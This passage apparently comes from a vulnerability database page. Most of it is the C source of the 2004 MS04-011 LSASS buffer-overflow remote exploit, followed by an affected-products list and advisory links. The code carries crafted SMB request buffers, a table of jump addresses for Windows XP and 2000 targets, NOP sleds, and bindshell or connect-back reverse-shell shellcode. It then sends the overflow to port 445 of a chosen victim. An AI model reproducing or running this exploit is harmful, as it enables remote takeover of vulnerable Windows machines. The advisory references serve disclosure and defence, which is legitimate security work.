"\xFF\xFF\xFF\x08\x00\xB8\x10\x00\x00\xB8\x10\x40\x00\x00\x00\x00" "\x00\xB9\x10\xEE\x05\x00\x00\x01\x10\x00\x00\x00\xB8\x10\x00\x00" "\x01\x00\x00\x00\x0C\x20\x00\x00\x00\x00\x09\x00\xAD\x0D\x00\x00" "\x00\x00\x00\x00\xAD\x0D\x00\x00"; // room for shellcode here ... char req9[] = "\x00\x00\x0F\xD8\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x18\x01" "\x00\x08\x70\x00\x10\x00\x00\x84\x0F\x00\x00\x00\x04\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x84\x0F\x54\x00\x02" "\x00\x26\x00\x00\x40\x95\x0F\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x00\x02\x10\x00\x00\x00" "\x84\x0F\x00\x00\x01\x00\x00\x00\x6C\x0F\x00\x00\x00\x00\x09\x00"; char shit3[] = "\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x9A\xA8\x40\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"; #define LEN 3500 #define BUFSIZE 2000 #define NOP 0x90 struct targets { int num; char name[50]; long jmpaddr; } ttarget[]= { { 0, "WinXP Professional [universal] lsass.exe ", 0x01004600 }, // jmp esp addr { 1, "Win2k Professional [universal] netrap.dll", 0x7515123c }, // jmp ebx addr { 2, "Win2k Advanced Server [SP4] netrap.dll", 0x751c123c }, // jmp ebx addr //{ 3, "reboot", 0xffffffff }, // crash { NULL } }; void usage(char *prog) { int i; printf("Usage:\n\n"); printf("%s <target> <victim IP> <bindport> [connectback IP] [options]\n\n", prog); printf("Targets:\n"); for (i=0; i<3; i++) printf(" %d [0x%.8x]: %s\n", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name); printf("\nOptions:\n"); printf(" -t: Detect remote OS:\n"); printf(" Windows 5.1 - WinXP\n"); printf(" Windows 5.0 - Win2k\n\n"); exit(0); } int main(int argc, char *argv[]) { int i; int opt = 0; char *target; char hostipc[40]; char hostipc2[40*2]; unsigned short port; unsigned long ip; unsigned char *sc; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(req4)+20]; char screq[BUFSIZE+sizeof(req7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4"; char strBuffer[BUFSIZE]; unsigned int targetnum = 0; int len, sockfd; short dport = 445; struct hostent *he; struct sockaddr_in their_addr; char smblen; char unclen; WSADATA wsa; printf("\nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 4) { usage(argv[0]); } target = argv[2]; sprintf((char *)hostipc,"\\\\%s\\ipc$", target); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, req4, sizeof(req4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); if (argc > 4) if (!memcmp(argv[4], "-t", 2)) opt = 1; if ( (argc > 4) && !opt ) { port = htons(atoi(argv[3]))^(USHORT)0x9999; ip = inet_addr(argv[4])^(ULONG)0x99999999; memcpy(&reverseshell[118], &port, 2); memcpy(&reverseshell[111], &ip, 4); sc = reverseshell; } else { port = htons(atoi(argv[3]))^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); sc = bindshell; } if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "\x3c\x12\x15\x75", 4); memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4); memcpy(&buf[2036], sc, strlen(sc)); memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr memcpy(&buf[2856], sc, strlen(sc)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, sc, strlen(sc)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500); WSAStartup(MAKEWORD(2,0),&wsa); if ((he=gethostbyname(argv[2])) == NULL) { // get the host info perror("[-] gethostbyname "); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(dport); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); printf("[*] Target: IP: %s: OS: %s\n", argv[2], ttarget[atoi(argv[1])].name); printf("[*] Connecting to %s:445 ... ", argv[2]); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("\n[-] Sorry, cannot connect to %s:445. Try again...\n", argv[2]); exit(1); } printf("OK\n"); if (send(sockfd, req1, sizeof(req1)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if (send(sockfd, req2, sizeof(req2)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if (send(sockfd, req3, sizeof(req3)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if ((argc > 5) || opt) { printf("[*] Detecting remote OS: "); for (i=0; i<12; i++) { printf("%c", recvbuf[48+i*2]); } printf("\n"); exit(0); } printf("[*] Attacking ... "); if (send(sockfd, req4u, smblen+4, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if (send(sockfd, req5, sizeof(req5)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if (send(sockfd, req6, sizeof(req6)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memcpy(screq2k, req8, sizeof(req8)-1); memcpy(screq2k+sizeof(req8)-1, sendbuf, (LEN+1)*2); memcpy(screq2k2, req9, sizeof(req9)-1); memcpy(screq2k2+sizeof(req9)-1, sendbuf+4348-sizeof(req8)+1, (LEN+1)*2-4348); memcpy(screq2k2+sizeof(req9)-1+(LEN+1)*2-4348-sizeof(req8)+1+206, shit3, sizeof(shit3)- 1); if (send(sockfd, screq2k, 4348, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if (send(sockfd, screq2k2, 4060, 0) == -1) { printf("[-] Send failed\n"); exit(1); } } else { memcpy(screq, req7, sizeof(req7)-1); memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE); memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16); screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0; if (send(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1){ printf("[-] Send failed\n"); exit(1); } } printf("OK\n"); len = recv(sockfd, recvbuf, 1600, 0); return 0; } // milw0rm.com [2004-04-29]

Products Mentioned

Configuraton 0

Microsoft>>Netmeeting >> Version *

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version r2

    Microsoft>>Windows_98 >> Version *

    Microsoft>>Windows_me >> Version *

    Microsoft>>Windows_nt >> Version 4.0

    Microsoft>>Windows_xp >> Version *

    Références

    http://www.ciac.org/ciac/bulletins/o-114.shtml
    Tags : third-party-advisory, government-resource, x_refsource_CIAC
    http://www.eeye.com/html/Research/Advisories/AD20040413C.html
    Tags : third-party-advisory, x_refsource_EEYE
    http://www.us-cert.gov/cas/techalerts/TA04-104A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://marc.info/?l=bugtraq&m=108325860431471&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://www.securityfocus.com/bid/10108
    Tags : vdb-entry, x_refsource_BID
    http://www.kb.cert.org/vuls/id/753212
    Tags : third-party-advisory, x_refsource_CERT-VN